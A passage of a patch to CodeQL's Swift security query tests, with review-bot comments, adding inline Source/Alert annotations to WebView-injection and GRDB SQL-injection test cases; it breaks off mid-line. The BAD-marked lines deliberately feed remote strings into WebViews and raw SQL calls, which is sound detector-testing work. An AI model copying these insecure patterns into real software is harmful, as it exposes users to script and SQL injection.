a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected +++ b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected 
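Review bot: `CommandInjection.qlref` is rewritten to `query: queries/Security/CWE-078/CommandInjection.ql` without the `postprocess: utils/test/InlineExpectationsTestQuery.ql` line that the `UnsafeUnpack.qlref` and `UnsafeWebViewFetch.qlref` conversions in this patch add. If the CWE-078 test sources carry `// $ Alert` annotations (they are not visible here), those annotations would not be checked against the query output. If the omission is deliberate, a short mention in the commit description would help; otherwise add `postprocess: utils/test/InlineExpectationsTestQuery.ql` as the second line.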
@@ -1,3 +1,22 @@ +#select +| UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | UnsafeWebViewFetch.swift:103:30:103:84 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:106:25:106:25 | data | UnsafeWebViewFetch.swift:105:18:105:72 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:106:25:106:25 | data | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | UnsafeWebViewFetch.swift:109:30:109:53 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:127:25:127:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:127:25:127:25 | "..." | Tainted data is used in a WebView fetch without restricting the base URL. 
| +| UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:174:25:174:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:174:25:174:25 | "..." | Tainted data is used in a WebView fetch without restricting the base URL. 
| +| UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | Tainted data is used in a WebView fetch without restricting the base URL. | edges | UnsafeWebViewFetch.swift:94:10:94:37 | try ... | UnsafeWebViewFetch.swift:117:21:117:35 | call to getRemoteData() | provenance | | | UnsafeWebViewFetch.swift:94:10:94:37 | try ... | UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | provenance | | 
@@ -135,22 +154,3 @@ nodes | UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | semmle.label | htmlData | | UnsafeWebViewFetch.swift:211:25:211:25 | htmlData | semmle.label | htmlData | subpaths -#select -| UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | UnsafeWebViewFetch.swift:103:30:103:84 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:106:25:106:25 | data | UnsafeWebViewFetch.swift:105:18:105:72 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:106:25:106:25 | data | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | UnsafeWebViewFetch.swift:109:30:109:53 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:127:25:127:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:127:25:127:25 | "..." 
| Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:174:25:174:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:174:25:174:25 | "..." | Tainted data is used in a WebView fetch without restricting the base URL. 
| -| UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | Tainted data is used in a WebView fetch without restricting the base URL. | diff --git a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.qlref b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.qlref index a5c8cb457a03..18d2fc0a49df 100644 --- a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.qlref +++ b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.qlref @@ -1 +1,2 @@ -queries/Security/CWE-079/UnsafeWebViewFetch.ql \ No newline at end of file +query: queries/Security/CWE-079/UnsafeWebViewFetch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.swift b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.swift index 1b687ade014b..ebac2b89a0b7 100644 --- a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.swift +++ b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.swift 
@@ -91,7 +91,7 @@ func getRemoteData() -> String { let url = URL(string: "http://example.com/") do { - return try String(contentsOf: url!) + return try String(contentsOf: url!) // $ Source } catch { return "" } @@ -100,13 +100,13 @@ func getRemoteData() -> String { func testSimpleFlows() { let webview = UIWebView() - webview.loadHTMLString(try! String(contentsOf: URL(string: "http://example.com/")!), baseURL: nil) // BAD + webview.loadHTMLString(try! String(contentsOf: URL(string: "http://example.com/")!), baseURL: nil) // BAD // $ Alert - let data = try! String(contentsOf: URL(string: "http://example.com/")!) - webview.loadHTMLString(data, baseURL: nil) // BAD + let data = try! String(contentsOf: URL(string: "http://example.com/")!) // $ Source + webview.loadHTMLString(data, baseURL: nil) // BAD // $ Alert let url = URL(string: "http://example.com/") - webview.loadHTMLString(try! String(contentsOf: url!), baseURL: nil) // BAD + webview.loadHTMLString(try! String(contentsOf: url!), baseURL: nil) // BAD // $ Alert } func testUIWebView() { 
@@ -117,14 +117,14 @@ func testUIWebView() { let remoteString = getRemoteData() webview.loadHTMLString(localString, baseURL: nil) // GOOD: the HTML data is local - webview.loadHTMLString(getRemoteData(), baseURL: nil) // BAD: HTML contains remote input, may access local secrets - webview.loadHTMLString(remoteString, baseURL: nil) // BAD + webview.loadHTMLString(getRemoteData(), baseURL: nil) // BAD: HTML contains remote input, may access local secrets // $ Alert + webview.loadHTMLString(remoteString, baseURL: nil) // BAD // $ Alert webview.loadHTMLString("" + localStringFragment + "", baseURL: nil) // GOOD: the HTML data is local - webview.loadHTMLString("" + remoteString + "", baseURL: nil) // BAD + webview.loadHTMLString("" + remoteString + "", baseURL: nil) // BAD // $ Alert webview.loadHTMLString("\(localStringFragment)", baseURL: nil) // GOOD: the HTML data is local - webview.loadHTMLString("\(remoteString)", baseURL: nil) // BAD + webview.loadHTMLString("\(remoteString)", baseURL: nil) // BAD // $ Alert let localSafeURL = URL(string: "about:blank") let localURL = URL(string: "http://example.com/") @@ -136,9 +136,9 @@ func testUIWebView() { webview.loadHTMLString(localString, baseURL: localURL!) // GOOD: a presumed safe baseURL is specified webview.loadHTMLString(remoteString, baseURL: localURL!) // GOOD: a presumed safe baseURL is specified webview.loadHTMLString(localString, baseURL: remoteURL!) // GOOD: the HTML data is local - webview.loadHTMLString(remoteString, baseURL: remoteURL!) // BAD + webview.loadHTMLString(remoteString, baseURL: remoteURL!) // BAD // $ Alert webview.loadHTMLString(localString, baseURL: remoteURL2!) // GOOD: the HTML data is local - webview.loadHTMLString(remoteString, baseURL: remoteURL2!) // BAD + webview.loadHTMLString(remoteString, baseURL: remoteURL2!) // BAD // $ Alert let localRequest = URLRequest(url: localURL!) let remoteRequest = URLRequest(url: remoteURL!) 
@@ -151,7 +151,7 @@ func testUIWebView() { webview.load(localData, mimeType: "text/html", textEncodingName: "utf-8", baseURL: localSafeURL!) // GOOD: the data is local webview.load(remoteData, mimeType: "text/html", textEncodingName: "utf-8", baseURL: localSafeURL!) // GOOD: a safe baseURL is specified webview.load(localData, mimeType: "text/html", textEncodingName: "utf-8", baseURL: remoteURL!) // GOOD: the HTML data is local - webview.load(remoteData, mimeType: "text/html", textEncodingName: "utf-8", baseURL: remoteURL!) // BAD + webview.load(remoteData, mimeType: "text/html", textEncodingName: "utf-8", baseURL: remoteURL!) // BAD // $ Alert } func testWKWebView() { @@ -164,14 +164,14 @@ func testWKWebView() { let remoteString = getRemoteData() webview.loadHTMLString(localString, baseURL: nil) // GOOD: the HTML data is local - webview.loadHTMLString(getRemoteData(), baseURL: nil) // BAD - webview.loadHTMLString(remoteString, baseURL: nil) // BAD + webview.loadHTMLString(getRemoteData(), baseURL: nil) // BAD // $ Alert + webview.loadHTMLString(remoteString, baseURL: nil) // BAD // $ Alert webview.loadHTMLString("" + localStringFragment + "", baseURL: nil) // GOOD: the HTML data is local - webview.loadHTMLString("" + remoteString + "", baseURL: nil) // BAD + webview.loadHTMLString("" + remoteString + "", baseURL: nil) // BAD // $ Alert webview.loadHTMLString("\(localStringFragment)", baseURL: nil) // GOOD: the HTML data is local - webview.loadHTMLString("\(remoteString)", baseURL: nil) // BAD + webview.loadHTMLString("\(remoteString)", baseURL: nil) // BAD // $ Alert let localSafeURL = URL(string: "about:blank") let localURL = URL(string: "http://example.com/") 
@@ -183,9 +183,9 @@ func testWKWebView() { webview.loadHTMLString(localString, baseURL: localURL!) // GOOD: a presumed safe baseURL is specified webview.loadHTMLString(remoteString, baseURL: localURL!) // GOOD: a presumed safe baseURL is specified webview.loadHTMLString(localString, baseURL: remoteURL!) // GOOD: the HTML data is local - webview.loadHTMLString(remoteString, baseURL: remoteURL!) // BAD + webview.loadHTMLString(remoteString, baseURL: remoteURL!) // BAD // $ Alert webview.loadHTMLString(localString, baseURL: remoteURL2!) // GOOD: the HTML data is local - webview.loadHTMLString(remoteString, baseURL: remoteURL2!) // BAD + webview.loadHTMLString(remoteString, baseURL: remoteURL2!) // BAD // $ Alert let localRequest = URLRequest(url: localURL!) let remoteRequest = URLRequest(url: remoteURL!) @@ -198,7 +198,7 @@ func testWKWebView() { webview.load(localData, mimeType: "text/html", characterEncodingName: "utf-8", baseURL: localSafeURL!) // GOOD: the data is local webview.load(remoteData, mimeType: "text/html", characterEncodingName: "utf-8", baseURL: localSafeURL!) // GOOD: a safe baseURL is specified webview.load(localData, mimeType: "text/html", characterEncodingName: "utf-8", baseURL: remoteURL!) // GOOD: the HTML data is local - webview.load(remoteData, mimeType: "text/html", characterEncodingName: "utf-8", baseURL: remoteURL!) // BAD + webview.load(remoteData, mimeType: "text/html", characterEncodingName: "utf-8", baseURL: remoteURL!) // BAD // $ Alert } func testQHelpExamples() { @@ -207,7 +207,7 @@ func testQHelpExamples() { // ... - webview.loadHTMLString(htmlData, baseURL: nil) // BAD + webview.loadHTMLString(htmlData, baseURL: nil) // BAD // $ Alert webview.loadHTMLString(htmlData, baseURL: URL(string: "about:blank")) // GOOD } diff --git a/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift b/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift index b0319c84eb5a..cad757a7f168 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift 
+++ b/swift/ql/test/query-tests/Security/CWE-089/GRDB.swift 
@@ -101,54 +101,54 @@ class CommonTableExpression { func test(database: Database) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - let _ = database.allStatements(sql: remoteString) // BAD + let _ = database.allStatements(sql: remoteString) // BAD // $ Alert let _ = database.allStatements(sql: localString) // GOOD - let _ = database.allStatements(sql: remoteString, arguments: nil) // BAD + let _ = database.allStatements(sql: remoteString, arguments: nil) // BAD // $ Alert let _ = database.allStatements(sql: localString, arguments: nil) // GOOD - let _ = database.cachedStatement(sql: remoteString) // BAD + let _ = database.cachedStatement(sql: remoteString) // BAD // $ Alert let _ = database.cachedStatement(sql: localString) // GOOD - let _ = database.internalCachedStatement(sql: remoteString) // BAD + let _ = database.internalCachedStatement(sql: remoteString) // BAD // $ Alert let _ = database.internalCachedStatement(sql: localString) // GOOD - database.execute(sql: remoteString) // BAD + database.execute(sql: remoteString) // BAD // $ Alert database.execute(sql: localString) // GOOD - database.execute(sql: remoteString, arguments: StatementArguments()) // BAD + database.execute(sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert database.execute(sql: localString, arguments: StatementArguments()) // GOOD - let _ = database.makeStatement(sql: remoteString) // BAD + let _ = database.makeStatement(sql: remoteString) // BAD // $ Alert let _ = database.makeStatement(sql: localString) // GOOD - let _ = database.makeStatement(sql: remoteString, prepFlags: 0) // BAD + let _ = database.makeStatement(sql: remoteString, prepFlags: 0) // BAD // $ Alert let _ = database.makeStatement(sql: localString, prepFlags: 0) // GOOD } func testSqlRequest() throws { let localString = "user" - let remoteString = 
try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - let _ = SQLRequest(stringLiteral: remoteString) // BAD + let _ = SQLRequest(stringLiteral: remoteString) // BAD // $ Alert let _ = SQLRequest(stringLiteral: localString) // GOOD - let _ = SQLRequest(unicodeScalarLiteral: remoteString) // BAD + let _ = SQLRequest(unicodeScalarLiteral: remoteString) // BAD // $ Alert let _ = SQLRequest(unicodeScalarLiteral: localString) // GOOD - let _ = SQLRequest(extendedGraphemeClusterLiteral: remoteString) // BAD + let _ = SQLRequest(extendedGraphemeClusterLiteral: remoteString) // BAD // $ Alert let _ = SQLRequest(extendedGraphemeClusterLiteral: localString) // GOOD - let _ = SQLRequest(stringInterpolation: remoteString) // BAD + let _ = SQLRequest(stringInterpolation: remoteString) // BAD // $ Alert let _ = SQLRequest(stringInterpolation: localString) // GOOD - let _ = SQLRequest(sql: remoteString) // BAD - let _ = SQLRequest(sql: remoteString, arguments: StatementArguments()) // BAD - let _ = SQLRequest(sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD - let _ = SQLRequest(sql: remoteString, arguments: StatementArguments(), cached: false) // BAD - let _ = SQLRequest(sql: remoteString, arguments: StatementArguments(), adapter: nil, cached: false) // BAD - let _ = SQLRequest(sql: remoteString, adapter: nil) // BAD - let _ = SQLRequest(sql: remoteString, adapter: nil, cached: false) // BAD - let _ = SQLRequest(sql: remoteString, cached: false) // BAD + let _ = SQLRequest(sql: remoteString) // BAD // $ Alert + let _ = SQLRequest(sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + let _ = SQLRequest(sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert + let _ = SQLRequest(sql: remoteString, arguments: StatementArguments(), cached: false) // BAD // $ Alert + let _ = SQLRequest(sql: remoteString, arguments: 
StatementArguments(), adapter: nil, cached: false) // BAD // $ Alert + let _ = SQLRequest(sql: remoteString, adapter: nil) // BAD // $ Alert + let _ = SQLRequest(sql: remoteString, adapter: nil, cached: false) // BAD // $ Alert + let _ = SQLRequest(sql: remoteString, cached: false) // BAD // $ Alert let _ = SQLRequest(sql: localString) // GOOD let _ = SQLRequest(sql: localString, arguments: StatementArguments()) // GOOD let _ = SQLRequest(sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD @@ -161,15 +161,15 @@ func testSqlRequest() throws { func testSql() throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - let _ = SQL(stringLiteral: remoteString) // BAD - let _ = SQL(unicodeScalarLiteral: remoteString) // BAD - let _ = SQL(extendedGraphemeClusterLiteral: remoteString) // BAD - let _ = SQL(stringInterpolation: remoteString) // BAD - let _ = SQL(sql: remoteString) // BAD + let _ = SQL(stringLiteral: remoteString) // BAD // $ Alert + let _ = SQL(unicodeScalarLiteral: remoteString) // BAD // $ Alert + let _ = SQL(extendedGraphemeClusterLiteral: remoteString) // BAD // $ Alert + let _ = SQL(stringInterpolation: remoteString) // BAD // $ Alert + let _ = SQL(sql: remoteString) // BAD // $ Alert let sql1 = SQL(stringLiteral: "") - sql1.append(sql: remoteString) // BAD + sql1.append(sql: remoteString) // BAD // $ Alert let _ = SQL(stringLiteral: localString) // GOOD let _ = SQL(unicodeScalarLiteral: localString) // GOOD 
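Review bot: None of the GOOD cases in `test(database:)` or `testSqlRequest()` sends `remoteString` through `arguments:`; every `arguments:` value in this hunk is `nil` or an empty `StatementArguments()`, so the new annotations pin only the constant-SQL case and never the parameter-binding pattern the query is expected to leave unflagged. The later GRDB hunks visible in this patch (`TableRecord`, `row.fetch*`, `SQLStatementCursor`, `CommonTableExpression`) follow the same shape, while SQLite.swift does cover it with `try stmt9.bind(remoteString) // GOOD`. Consider adding a negative case such as `database.execute(sql: "SELECT * FROM users WHERE username=?", arguments: StatementArguments([remoteString])) // GOOD`; the stub `StatementArguments` is declared outside this hunk and may need an initializer that accepts values. `testSqlRequest()` continues past the end of the hunk, so a case of this kind may already exist in lines not shown here.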
@@ -182,34 +182,34 @@ func testSql() throws { func test(tableDefinition: TableDefinition) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - tableDefinition.column(sql: remoteString) // BAD + tableDefinition.column(sql: remoteString) // BAD // $ Alert tableDefinition.column(sql: localString) // GOOD - tableDefinition.check(sql: remoteString) // BAD + tableDefinition.check(sql: remoteString) // BAD // $ Alert tableDefinition.check(sql: localString) // GOOD - tableDefinition.constraint(sql: remoteString) // BAD + tableDefinition.constraint(sql: remoteString) // BAD // $ Alert tableDefinition.constraint(sql: localString) // GOOD } func test(tableAlteration: TableAlteration) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - tableAlteration.addColumn(sql: remoteString) // BAD + tableAlteration.addColumn(sql: remoteString) // BAD // $ Alert tableAlteration.addColumn(sql: localString) // GOOD } func test(columnDefinition: ColumnDefinition) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) 
// $ Source - let _ = columnDefinition.check(sql: remoteString) // BAD - let _ = columnDefinition.defaults(sql: remoteString) // BAD - let _ = columnDefinition.generatedAs(sql: remoteString) // BAD - let _ = columnDefinition.generatedAs(sql: remoteString, .virtual) // BAD + let _ = columnDefinition.check(sql: remoteString) // BAD // $ Alert + let _ = columnDefinition.defaults(sql: remoteString) // BAD // $ Alert + let _ = columnDefinition.generatedAs(sql: remoteString) // BAD // $ Alert + let _ = columnDefinition.generatedAs(sql: remoteString, .virtual) // BAD // $ Alert let _ = columnDefinition.check(sql: localString) // GOOD let _ = columnDefinition.defaults(sql: localString) // GOOD 
@@ -219,67 +219,67 @@ func test(columnDefinition: ColumnDefinition) throws { func testTableRecord() throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - let _ = TableRecord.select(sql: remoteString) // BAD - let _ = TableRecord.select(sql: remoteString, arguments: StatementArguments()) // BAD + let _ = TableRecord.select(sql: remoteString) // BAD // $ Alert + let _ = TableRecord.select(sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert let _ = TableRecord.select(sql: localString) // GOOD let _ = TableRecord.select(sql: localString, arguments: StatementArguments()) // GOOD - let _ = TableRecord.filter(sql: remoteString) // BAD - let _ = TableRecord.filter(sql: remoteString, arguments: StatementArguments()) // BAD + let _ = TableRecord.filter(sql: remoteString) // BAD // $ Alert + let _ = TableRecord.filter(sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert let _ = TableRecord.filter(sql: localString) // GOOD let _ = TableRecord.filter(sql: localString, arguments: StatementArguments()) // GOOD - let _ = TableRecord.order(sql: remoteString) // BAD - let _ = TableRecord.order(sql: remoteString, arguments: StatementArguments()) // BAD + let _ = TableRecord.order(sql: remoteString) // BAD // $ Alert + let _ = TableRecord.order(sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert let _ = TableRecord.order(sql: localString) // GOOD let _ = TableRecord.order(sql: localString, arguments: StatementArguments()) // GOOD } func test(statementCache: StatementCache) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) 
// $ Source - let _ = statementCache.statement(remoteString) // BAD + let _ = statementCache.statement(remoteString) // BAD // $ Alert let _ = statementCache.statement(localString) // GOOD } func test(row: Row, stmt: Statement) throws { let localString = "user" - let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) + let remoteString = try String(contentsOf: URL(string: "http://example.com/")!) // $ Source - row.fetchCursor(stmt, sql: remoteString) // BAD - row.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - row.fetchCursor(stmt, sql: remoteString, adapter: nil) // BAD - row.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + row.fetchCursor(stmt, sql: remoteString) // BAD // $ Alert + row.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + row.fetchCursor(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + row.fetchCursor(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert row.fetchCursor(stmt, sql: localString) // GOOD row.fetchCursor(stmt, sql: localString, arguments: StatementArguments()) // GOOD row.fetchCursor(stmt, sql: localString, adapter: nil) // GOOD row.fetchCursor(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD - row.fetchAll(stmt, sql: remoteString) // BAD - row.fetchAll(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - row.fetchAll(stmt, sql: remoteString, adapter: nil) // BAD - row.fetchAll(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + row.fetchAll(stmt, sql: remoteString) // BAD // $ Alert + row.fetchAll(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + row.fetchAll(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + row.fetchAll(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert row.fetchAll(stmt, sql: localString) 
// GOOD row.fetchAll(stmt, sql: localString, arguments: StatementArguments()) // GOOD row.fetchAll(stmt, sql: localString, adapter: nil) // GOOD row.fetchAll(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD - row.fetchOne(stmt, sql: remoteString) // BAD - row.fetchOne(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - row.fetchOne(stmt, sql: remoteString, adapter: nil) // BAD - row.fetchOne(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD + row.fetchOne(stmt, sql: remoteString) // BAD // $ Alert + row.fetchOne(stmt, sql: remoteString, arguments: StatementArguments()) // BAD // $ Alert + row.fetchOne(stmt, sql: remoteString, adapter: nil) // BAD // $ Alert + row.fetchOne(stmt, sql: remoteString, arguments: StatementArguments(), adapter: nil) // BAD // $ Alert row.fetchOne(stmt, sql: localString) // GOOD row.fetchOne(stmt, sql: localString, arguments: StatementArguments()) // GOOD row.fetchOne(stmt, sql: localString, adapter: nil) // GOOD row.fetchOne(stmt, sql: localString, arguments: StatementArguments(), adapter: nil) // GOOD - row.fetchSet(stmt, sql: remoteString) // BAD - row.fetchSet(stmt, sql: remoteString, arguments: StatementArguments()) // BAD - row.fetchSet(stmt, sql: 